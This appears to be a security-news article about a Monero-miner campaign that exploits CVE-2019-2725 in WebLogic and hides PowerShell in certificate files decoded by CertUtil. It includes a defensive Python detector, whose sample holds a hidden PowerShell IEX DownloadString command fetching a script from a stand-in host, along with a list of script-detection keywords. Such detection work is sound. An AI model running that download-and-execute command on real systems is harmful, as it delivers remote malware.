Malware that hides cryptocurrency-mining bots or programs has been spreading for the past few years and has become one of the most popular ways to exploit other people's processing power to mine cryptocurrency. Recently, a security advisory was released for CVE-2019-2725, a deserialization vulnerability in the widely used Oracle WebLogic Server. In April 2019, Trend Micro detected a series of attacks that leveraged EternalBlue and PowerShell to deliver a Monero cryptocurrency miner. Reports also appeared on the SANS ISC InfoSec forums that CVE-2019-2725 was already being exploited in the wild to install a cryptocurrency miner, a Monero miner to be exact. After confirming these reports through the Trend Micro™ Smart Protection Network™, it became clear that the malware in question hides its malicious code in certificate files as an obfuscation tactic.
According to Trend Micro's findings, the Monero miner campaign begins by exploiting CVE-2019-2725 on the victim's machine to execute a command that kicks off a series of routines. First, a PowerShell script downloads a certificate file from the command-and-control (C&C) server and saves it under %APPDATA% with the file name cert.cer.
It then puts CertUtil to work, a Windows component that decodes certificate files, to decode the downloaded file and ultimately reveal a PowerShell command. That command downloads and executes another PowerShell script in memory, which in turn downloads and executes several files: Sysupdate.exe, the payload for the Monero miner; Config.json, the configuration file for the XMR miner; Networkservice.exe, possibly used for the propagation and exploitation of WebLogic; Sysguard.exe, which serves as the watchdog for the miner process; Update.ps1, a PowerShell script that runs every 30 seconds; and Clean.bat, which deletes the other components.
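A defender-side check for the obfuscation tactic described above, added here as an example and not taken from Trend Micro's report or from the campaign itself: CertUtil will decode any base64 body between certificate markers without caring what it is, so this script decodes a cert.cer-style file and reports whether the body is actually an ASN.1/DER structure or printable text carrying PowerShell markers. All sample inputs (the DER stub, the hidden command, the c2.invalid URL) are constructed for the example.

```python
import base64
import re
import string

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
PRINTABLE = set(string.printable.encode())
SCRIPT_MARKERS = (b"powershell", b"iex", b"invoke-expression", b"downloadstring", b"net.webclient")


def looks_like_der_sequence(raw: bytes) -> bool:
    """True if raw is one ASN.1 SEQUENCE whose declared length spans the whole blob."""
    if len(raw) < 2 or raw[0] != 0x30:     # 0x30 is the SEQUENCE tag every DER cert starts with
        return False
    first = raw[1]
    if first < 0x80:                         # short-form length byte
        return first == len(raw) - 2
    n = first & 0x7F                         # long-form: the next n bytes hold the length
    if n == 0 or len(raw) < 2 + n:
        return False
    return int.from_bytes(raw[2:2 + n], "big") == len(raw) - 2 - n


def classify_cert_file(text: str) -> str:
    """Return certificate, hidden-script, unknown-blob, undecodable or not-pem."""
    m = PEM_RE.search(text)
    if not m:
        return "not-pem"
    try:
        raw = base64.b64decode("".join(m.group(1).split()), validate=True)
    except ValueError:                       # binascii.Error is a ValueError subclass
        return "undecodable"
    if looks_like_der_sequence(raw):
        return "certificate"
    printable_ratio = sum(b in PRINTABLE for b in raw) / max(len(raw), 1)
    if printable_ratio > 0.95 and any(k in raw.lower() for k in SCRIPT_MARKERS):
        return "hidden-script"
    return "unknown-blob"


def wrap_pem(body: bytes) -> str:
    """Base64-encode body and wrap it in certificate markers, as certutil -encode would."""
    b64 = base64.b64encode(body).decode()
    lines = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN CERTIFICATE-----\n{lines}\n-----END CERTIFICATE-----\n"


# Constructed samples, not artefacts from the campaign.
GENUINE_DER = b"\x30\x82\x01\x2c" + b"\x00" * 300   # SEQUENCE, long-form length 300, stub content
GENUINE_CERT_FILE = wrap_pem(GENUINE_DER)
# The tactic from the article: a PowerShell command stored where a certificate body belongs.
HIDDEN_SCRIPT_FILE = wrap_pem(b"powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s.ps1')\"")
```

To triage a file dropped under %APPDATA%, read it as text and pass it to classify_cert_file; anything other than "certificate" for a file named like a certificate deserves a closer look.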
This isn't the only Monero miner case reported in recent months. Earlier, Trend Micro discovered BlackSquid, a completely new malware family capable of exploiting eight notorious vulnerabilities, including EternalBlue and DoublePulsar, to install the XMRig Monero-mining malware. The Nansh0u crypto-mining campaign in May 2019 infected more than 50,000 servers by exploiting vulnerabilities, as reported by Guardicore Labs.
In its official blog post, Trend Micro has also suggested several ways to remove this malware and stay protected against it. The recommendations include its own malware protection suite and a few other precautions that users should be aware of.